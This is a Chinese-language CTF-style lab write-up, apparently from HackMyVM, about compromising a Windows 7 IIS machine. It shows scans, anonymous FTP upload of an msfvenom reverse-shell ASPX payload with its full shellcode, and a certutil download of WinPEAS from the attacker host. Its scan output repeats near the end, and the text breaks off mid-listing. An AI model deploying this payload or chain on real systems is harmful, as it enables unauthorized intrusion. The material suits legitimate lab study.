![\"image-20250608201539520\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235153.png\")
<\/div>\n
![\"image-20250608203928661\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506082235155.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nTo scan or not to scan? That is the question.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.105:21\nOpen 192.168.10.105:445\nOpen 192.168.10.105:80\nOpen 192.168.10.105:135\nOpen 192.168.10.105:139\nOpen 192.168.10.105:5357\nOpen 192.168.10.105:49152\nOpen 192.168.10.105:49153\nOpen 192.168.10.105:49155\nOpen 192.168.10.105:49156\nOpen 192.168.10.105:49157\nOpen 192.168.10.105:49154\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack ttl 128 Microsoft ftpd\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| 10-05-24 12:16PM <DIR> aspnet_client\n| 10-05-24 12:27AM 689 iisstart.htm\n|_10-05-24 12:27AM 184946 welcome.png\n| ftp-syst: \n|_ SYST: Windows_NT\n80\/tcp open http syn-ack ttl 128 Microsoft IIS httpd 7.5\n|_http-server-header: Microsoft-IIS\/7.5\n| http-methods: \n| Supported Methods: OPTIONS TRACE GET HEAD POST\n|_ Potentially risky methods: TRACE\n|_http-title: IIS7\n135\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn\n445\/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\n5357\/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Service Unavailable\n49152\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49153\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49154\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49155\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49156\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49157\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:0B:1E:2F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: QUOTED-PC; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| nbstat: NetBIOS name: QUOTED-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:0b:1e:2f (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n| QUOTED-PC<00> Flags: <unique><active>\n| WORKGROUP<00> Flags: <group><active>\n| QUOTED-PC<20> Flags: <unique><active>\n| WORKGROUP<1e> Flags: <group><active>\n| WORKGROUP<1d> Flags: <unique><active>\n| \\x01\\x02__MSBROWSE__\\x02<01> Flags: <group><active>\n| Statistics:\n| 08:00:27:0b:1e:2f:00:00:00:00:00:00:00:00:00:00:00\n| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb-os-discovery: \n| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\n| OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\n| Computer name: quoted-PC\n| NetBIOS computer name: QUOTED-PC\\x00\n| Workgroup: WORKGROUP\\x00\n|_ System time: 2025-06-08T15:41:51+03:00\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 58509\/tcp): CLEAN (Couldn't connect)\n| Check 2 (port 48287\/tcp): CLEAN (Couldn't connect)\n| Check 3 (port 7707\/udp): CLEAN (Timeout)\n| Check 4 (port 10964\/udp): CLEAN (Failed to receive data)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked\n| smb-security-mode: \n| account_used: guest\n| authentication_level: user\n| challenge_response: supported\n|_ message_signing: disabled (dangerous, but default)\n| smb2-time: \n| date: 2025-06-08T12:41:51\n|_ start_date: 2025-06-08T12:36:01\n|_clock-skew: mean: -59m54s, deviation: 1h43m55s, median: 5s\n| smb2-security-mode: \n| 2:1:0: \n|_ Message signing enabled but not required<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ dirsearch -u http:\/\/$IP\/ 2>\/dev\/null \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/quoted\/reports\/http_192.168.10.105\/__25-06-08_08-46-41.txt\n\nTarget: http:\/\/192.168.10.105\/\n\n[08:46:41] Starting: \n[08:46:42] 403 - 312B - \/%2e%2e\/\/google.com\n[08:46:42] 403 - 312B - \/.%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd\n[08:46:42] 404 - 1KB - \/.asmx\n[08:46:42] 404 - 1KB - \/.ashx\n[08:46:52] 403 - 312B - \/\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd\n[08:47:10] 301 - 162B - \/aspnet_client -> http:\/\/192.168.10.105\/aspnet_client\/\n[08:47:10] 403 - 1KB - \/aspnet_client\/\n[08:47:14] 403 - 312B - \/cgi-bin\/.%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd\n[08:47:52] 404 - 1KB - \/service.asmx\n[08:48:01] 403 - 2KB - \/Trace.axd\n[08:48:02] 404 - 2KB - \/umbraco\/webservices\/codeEditorSave.asmx\n[08:48:07] 404 - 1KB - \/WebResource.axd?d=LER8t9aS\n\nTask Completed<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20250608210017295\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u67e5\u770b\u6e90\u4ee3\u7801\u4f46\u662f\u5e76\u672a\u53d1\u73b0\u6709\u4e9b\u5565\uff0c\u5c1d\u8bd5\u522b\u7684\u65b9\u5411\u3002<\/p>\n
ftp\u670d\u52a1\u63a2\u6d4b<\/h3>\n
\u524d\u9762\u63a2\u6d4b\u5230\u53ef\u4ee5\u8fdb\u884c\u533f\u540d\u767b\u5f55\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.105.\n220 Microsoft FTP Service\nName (192.168.10.105:kali): anonymous\n331 Anonymous access allowed, send identity (e-mail name) as password.\nPassword: \n230 User logged in.\nRemote system type is Windows_NT.\nftp> mget *\nmget iisstart.htm [anpqy?]? \n229 Entering Extended Passive Mode (|||49162|)\n125 Data connection already open; Transfer starting.\n100% |************************************************************************************************************************************************| 689 0.98 MiB\/s 00:00 ETA\n226 Transfer complete.\n689 bytes received in 00:00 (507.42 KiB\/s)\nmget welcome.png [anpqy?]? \n229 Entering Extended Passive Mode (|||49163|)\n150 Opening ASCII mode data connection.\n100% |************************************************************************************************************************************************| 180 KiB 3.80 MiB\/s 00:00 ETA\n226 Transfer complete.\nWARNING! 820 bare linefeeds received in ASCII mode.\nFile may not have transferred correctly.\n184946 bytes received in 00:00 (3.75 MiB\/s)<\/code><\/pre>\n\u7136\u540e\u53d1\u73b0\u6b63\u662fweb\u7684\u76ee\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ cat iisstart.htm\n<!DOCTYPE html PUBLIC "-\/\/W3C\/\/DTD XHTML 1.0 Strict\/\/EN" "http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-strict.dtd">\n<html xmlns="http:\/\/www.w3.org\/1999\/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text\/html; charset=iso-8859-1" \/>\n<title>IIS7<\/title>\n<style type="text\/css">\n<!--\nbody {\n color:#000000;\n background-color:#B3B3B3;\n margin:0;\n}\n\n#container {\n margin-left:auto;\n margin-right:auto;\n text-align:center;\n }\n\na img {\n border:none;\n}\n\n-->\n<\/style>\n<\/head>\n<body>\n<div id="container">\n<a href="http:\/\/go.microsoft.com\/fwlink\/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" \/><\/a>\n<\/div>\n<\/body>\n<\/html> \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ curl -s http:\/\/$IP\/\n<!DOCTYPE html PUBLIC "-\/\/W3C\/\/DTD XHTML 1.0 Strict\/\/EN" "http:\/\/www.w3.org\/TR\/xhtml1\/DTD\/xhtml1-strict.dtd">\n<html xmlns="http:\/\/www.w3.org\/1999\/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text\/html; charset=iso-8859-1" \/>\n<title>IIS7<\/title>\n<style type="text\/css">\n<!--\nbody {\n color:#000000;\n background-color:#B3B3B3;\n margin:0;\n}\n\n#container {\n margin-left:auto;\n margin-right:auto;\n text-align:center;\n }\n\na img {\n border:none;\n}\n\n-->\n<\/style>\n<\/head>\n<body>\n<div id="container">\n<a href="http:\/\/go.microsoft.com\/fwlink\/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" \/><\/a>\n<\/div>\n<\/body>\n<\/html><\/code><\/pre>\n\u8fdb\u884c\u63a2\u6d4b\uff0c\u770b\u4e00\u4e0b\u662f\u5426\u53ef\u4ee5\u4e0a\u4f20shell\uff01\u56e0\u4e3a\u662fIIS<\/code>\u6240\u4ee5\u5c1d\u8bd5\u4e0a\u4f20\u7684\u4e3aaspx<\/code>\u7684shell\u3002\u3002<\/p>\n\u4e0a\u4f20aspx\u53cd\u5f39shell<\/h3>\n
\u9996\u5148\u6211\u4eec\u9700\u8981\u4e00\u4e2a.aspx<\/code>\u7684\u6728\u9a6c\uff0c\u53ef\u4ee5\u627e\u73b0\u6210\u7684\uff0c\u4e5f\u53ef\u4ee5\u76f4\u63a5\u4f7f\u7528msf\u751f\u6210\u4e00\u4e2a\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ msfvenom -p windows\/x64\/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of aspx file: 3407 bytes\n<%@ Page Language="C#" AutoEventWireup="true" %>\n<%@ Import Namespace="System.IO" %>\n<script runat="server">\n private static Int32 MEM_COMMIT=0x1000;\n private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;\n\n [System.Runtime.InteropServices.DllImport("kernel32")]\n private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);\n\n [System.Runtime.InteropServices.DllImport("kernel32")]\n private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);\n\n protected void Page_Load(object sender, EventArgs e)\n {\n byte[] my9L = new byte[460] {0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,\n0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x48,\n0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,\n0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,\n0x48,0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,\n0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,\n0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,\n0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,\n0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,\n0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,\n0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x00,0x00,0x41,\n0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x04,0xd2,\n0xc0,0xa8,0x0a,0x6a,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,\n0x4c,0x89,0xea,0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x4d,\n0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,\n0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,\n0x99,0xa5,0x74,0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,0x63,0x6d,0x64,0x00,0x00,\n0x00,0x00,0x00,0x41,0x50,0x41,0x50,0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,0x41,\n0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x01,0x01,0x48,0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,\n0xe6,0x56,0x50,0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,0xff,0xc8,0x4d,0x89,0xc1,\n0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,0x41,\n0xba,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,\n0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,\n0x59,0x41,0x89,0xda,0xff,0xd5};\n\n IntPtr vIGwqi5 = VirtualAlloc(IntPtr.Zero,(UIntPtr)my9L.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n System.Runtime.InteropServices.Marshal.Copy(my9L,0,vIGwqi5,my9L.Length);\n IntPtr kHduZ8ZlHs = IntPtr.Zero;\n IntPtr nDx9WQ2UEd = CreateThread(IntPtr.Zero,UIntPtr.Zero,vIGwqi5,IntPtr.Zero,0,ref kHduZ8ZlHs);\n }\n<\/script>\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ msfvenom -p windows\/x64\/shell_reverse_tcp lhost=192.168.10.106 lport=1234 -f aspx > shell.aspx\n[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\n[-] No arch selected, selecting arch: x64 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 460 bytes\nFinal size of aspx file: 3409 bytes<\/code><\/pre>\n\u5c1d\u8bd5\u4e0a\u4f20\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.10.105.\n220 Microsoft FTP Service\nName (192.168.10.105:kali): anonymous\n331 Anonymous access allowed, send identity (e-mail name) as password.\nPassword: \n230 User logged in.\nRemote system type is Windows_NT.\nftp> put shell.aspx \nlocal: shell.aspx remote: shell.aspx\n229 Entering Extended Passive Mode (|||49166|)\n150 Opening ASCII mode data connection.\n100% |************************************************************************************************************************************************| 3454 36.19 MiB\/s --:-- ETA\n226 Transfer complete.\n3454 bytes sent in 00:00 (1.33 MiB\/s)\nftp> exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ curl -s http:\/\/$IP\/shell.aspx<\/code><\/pre>\n\u53d1\u73b0\u5f39\u8fc7\u6765\u4e86\uff01<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u53c8\u662fwindows\u9776\u673a\uff0c\u8fd9\u6bb5\u65f6\u95f4\u505a\u4e86\u597d\u51e0\u4e2a\u4e86\uff0c\u5c1d\u8bd5\u4e0a\u4f20WinPEAS<\/code>\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff01<\/p>\nc:\\Users\\quoted\\Desktop>dir\ndir\n C s\ufffdr\ufffdc\ufffds\ufffdndeki birimin etiketi yok.\n Birim Seri Numaras\ufffd: D4DC-8644\n\n c:\\Users\\quoted\\Desktop dizini\n\n06.10.2024 17:25 <DIR> .\n06.10.2024 17:25 <DIR> ..\n06.10.2024 17:25 23 user.txt\n 1 Dosya 23 bayt\n 2 Dizin 22.207.266.816 bayt bo\ufffd\n\nc:\\Users\\quoted\\Desktop>type user.txt\ntype user.txt\nHMV{User_Flag_Obtained}\nc:\\Users\\quoted\\Desktop>certutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.bat\ncertutil -urlcache -split -f http:\/\/192.168.10.106:8888\/winPEAS.bat\n**** \ufffdevrimi\ufffdi ****\n 0000 ...\n 9056\nCertUtil: -URLCache komutu ba\ufffdar\ufffdyla tamamland\ufffd.\n\nc:\\Users\\quoted\\Desktop>whoami \/all\nwhoami \/all\n\nKULLANICI B\ufffdLG\ufffdLER\ufffd\n-------------------\n\nKullan\ufffdc\ufffd ad\ufffd SID \n============================ ========\nnt authority\\network service S-1-5-20\n\nGRUP B\ufffdLG\ufffdLER\ufffd\n--------------\n\nGrup Ad\ufffd T\ufffdr SID \ufffdznitelikler \n==================================== ================ ============================================================= ============================================================\nZorunlu Etiket\\Sistem Zorunlu D\ufffdzeyi Etiket S-1-16-16384 \nEveryone \ufffdyi bilinen grup S-1-1-0 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nBUILTIN\\Users Di\ufffder Ad S-1-5-32-545 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nNT AUTHORITY\\SERVICE \ufffdyi bilinen grup S-1-5-6 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nKONSOL OTURUMU A\ufffdMA \ufffdyi bilinen grup S-1-2-1 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nNT AUTHORITY\\Authenticated Users \ufffdyi bilinen grup S-1-5-11 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nNT AUTHORITY\\This Organization \ufffdyi bilinen grup S-1-5-15 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nBUILTIN\\IIS_IUSRS Di\ufffder Ad S-1-5-32-568 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nLOCAL \ufffdyi bilinen grup S-1-2-0 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\nIIS APPPOOL\\DefaultAppPool \ufffdyi bilinen grup S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415 Zorunlu grup, Varsay\ufffdlan olarak etkin, Etkinle\ufffdtirilmi\ufffd grup\n\nAYRICALIK B\ufffdLG\ufffdLER\ufffd\n----------------------\n\nAyr\ufffdcal\ufffdk Ad\ufffd A\ufffd\ufffdklama Durum \n============================= ======================================================== ==========\nSeAssignPrimaryTokenPrivilege \ufffd\ufffdlem d\ufffdzeyi belirtecini de\ufffdi\ufffdtir Devre D\ufffd\ufffd\ufffd\nSeIncreaseQuotaPrivilege \ufffd\ufffdlem i\ufffdin bellek kotalar\ufffd ayarla Devre D\ufffd\ufffd\ufffd\nSeSecurityPrivilege Denetimi ve g\ufffdvenlik g\ufffdnl\ufffd\ufffd\ufffdn\ufffd y\ufffdnet Devre D\ufffd\ufffd\ufffd\nSeShutdownPrivilege Sistemi kapat Devre D\ufffd\ufffd\ufffd\nSeAuditPrivilege G\ufffdvenlik denetimleri olu\ufffdtur Devre D\ufffd\ufffd\ufffd\nSeChangeNotifyPrivilege \ufffdapraz ge\ufffdi\ufffd denetimini atla Etkin \nSeUndockPrivilege Bilgisayar\ufffd takma biriminden \ufffd\ufffdkar Devre D\ufffd\ufffd\ufffd\nSeImpersonatePrivilege Kimlik do\ufffdrulamas\ufffdndan sonra istemcinin \ufffdzelliklerini al Etkin \nSeCreateGlobalPrivilege Genel nesneler olu\ufffdtur Etkin \nSeIncreaseWorkingSetPrivilege \ufffd\ufffdlem \ufffdal\ufffd\ufffdma k\ufffdmesini art\ufffdr Devre D\ufffd\ufffd\ufffd\nSeTimeZonePrivilege Saat dilimini de\ufffdi\ufffdtir <\/code><\/pre>\n\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nTo scan or not to scan? That is the question.\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.105:21\nOpen 192.168.10.105:445\nOpen 192.168.10.105:80\nOpen 192.168.10.105:135\nOpen 192.168.10.105:139\nOpen 192.168.10.105:5357\nOpen 192.168.10.105:49152\nOpen 192.168.10.105:49153\nOpen 192.168.10.105:49155\nOpen 192.168.10.105:49156\nOpen 192.168.10.105:49157\nOpen 192.168.10.105:49154\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack ttl 128 Microsoft ftpd\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| 10-05-24 12:16PM <DIR> aspnet_client\n| 10-05-24 12:27AM 689 iisstart.htm\n|_10-05-24 12:27AM 184946 welcome.png\n| ftp-syst: \n|_ SYST: Windows_NT\n80\/tcp open http syn-ack ttl 128 Microsoft IIS httpd 7.5\n|_http-server-header: Microsoft-IIS\/7.5\n| http-methods: \n| Supported Methods: OPTIONS TRACE GET HEAD POST\n|_ Potentially risky methods: TRACE\n|_http-title: IIS7\n135\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn\n445\/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)\n5357\/tcp open http syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Service Unavailable\n49152\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49153\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49154\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49155\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49156\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\n49157\/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC\nMAC Address: 08:00:27:0B:1E:2F (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: QUOTED-PC; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| nbstat: NetBIOS name: QUOTED-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:0b:1e:2f (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n| QUOTED-PC<00> Flags: <unique><active>\n| WORKGROUP<00> Flags: <group><active>\n| QUOTED-PC<20> Flags: <unique><active>\n| WORKGROUP<1e> Flags: <group><active>\n| WORKGROUP<1d> Flags: <unique><active>\n| \\x01\\x02__MSBROWSE__\\x02<01> Flags: <group><active>\n| Statistics:\n| 08:00:27:0b:1e:2f:00:00:00:00:00:00:00:00:00:00:00\n| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb-os-discovery: \n| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)\n| OS CPE: cpe:\/o:microsoft:windows_7::sp1:professional\n| Computer name: quoted-PC\n| NetBIOS computer name: QUOTED-PC\\x00\n| Workgroup: WORKGROUP\\x00\n|_ System time: 2025-06-08T15:41:51+03:00\n| p2p-conficker: \n| Checking for Conficker.C or higher...\n| Check 1 (port 58509\/tcp): CLEAN (Couldn't connect)\n| Check 2 (port 48287\/tcp): CLEAN (Couldn't connect)\n| Check 3 (port 7707\/udp): CLEAN (Timeout)\n| Check 4 (port 10964\/udp): CLEAN (Failed to receive data)\n|_ 0\/4 checks are positive: Host is CLEAN or ports are blocked\n| smb-security-mode: \n| account_used: guest\n| authentication_level: user\n| challenge_response: supported\n|_ message_signing: disabled (dangerous, but default)\n| smb2-time: \n| date: 2025-06-08T12:41:51\n|_ start_date: 2025-06-08T12:36:01\n|_clock-skew: mean: -59m54s, deviation: 1h43m55s, median: 5s\n| smb2-security-mode: \n| 2:1:0: \n|_ Message signing enabled but not required<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/quoted]\n\u2514\u2500$ dirsearch -u http:\/\/$IP\/ 2>\/dev\/null \n\n _|. _ _ _ _ _ _|_ v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460\n\nOutput File: \/home\/kali\/temp\/quoted\/reports\/http_192.168.10.105\/__25-06-08_08-46-41.txt\n\nTarget: http:\/\/192.168.10.105\/\n\n[08:46:41] Starting: \n[08:46:42] 403 - 312B - \/%2e%2e\/\/google.com\n[08:46:42] 403 - 312B - \/.%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd\n[08:46:42] 404 - 1KB - \/.asmx\n[08:46:42] 404 - 1KB - \/.ashx\n[08:46:52] 403 - 312B - \/\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd\n[08:47:10] 301 - 162B - \/aspnet_client -> http:\/\/192.168.10.105\/aspnet_client\/\n[08:47:10] 403 - 1KB - \/aspnet_client\/\n[08:47:14] 403 - 312B - \/cgi-bin\/.%2e\/%2e%2e\/%2e%2e\/%2e%2e\/etc\/passwd\n[08:47:52] 404 - 1KB - \/service.asmx\n[08:48:01] 403 - 2KB - \/Trace.axd\n[08:48:02] 404 - 2KB - 